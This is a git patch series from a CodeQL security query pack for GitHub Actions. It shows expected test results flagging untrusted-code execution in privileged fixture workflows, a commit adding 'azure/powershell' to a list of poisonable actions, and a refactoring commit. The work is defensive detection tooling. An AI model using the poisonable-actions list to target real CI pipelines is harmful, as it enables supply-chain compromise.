.github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | .github/workflows/test14.yml:198:7:206:4 | Uses Step | +| .github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run Step: email | .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| .github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step | .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | +| .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | +| .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From a057b9dd4456c58d475a784a898acdbb81fbaa20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:39:34 +0200 Subject: [PATCH 611/707] Add poisonable step for azure/powershell --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2ee9af6904ed..e32bc48a9832 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -4,6 +4,7 @@ extensions: extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: + - ["azure/powershell"] - ["pre-commit/action"] - ["oxsecurity/megalinter"] - ["bridgecrewio/checkov-action"] From b2a3aaacfd0b1fecd8aa8a609c05eafec16950a5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:40:25 +0200 Subject: [PATCH 612/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 404c86d212cc..5cf09c3601f2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.72 +version: 0.1.73 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1296bbd667b1..25486553ea8b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.72 +version: 0.1.73 groups: [actions, queries] suites: codeql-suites extractor: javascript From d1d92ae68a25bee131e3fb60c5428cbc124027bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 10:13:20 +0200 Subject: [PATCH 613/707] Create getATriggerEvent for Steps and refactor the code to use it --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 +- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 2 +- .../security/OutputClobberingQuery.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.actual | 342 ------------------ .../UntrustedCheckoutCritical.expected | 2 + 9 files changed, 25 insertions(+), 360 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e41354ce31b6..ad7bd67a18c8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -17,6 +17,8 @@ class AstNode instanceof AstNodeImpl { Job getEnclosingJob() { result = super.getEnclosingJob() } + Event getATriggerEvent() { result = super.getATriggerEvent() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } @@ -100,8 +102,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } @@ -200,8 +200,6 @@ 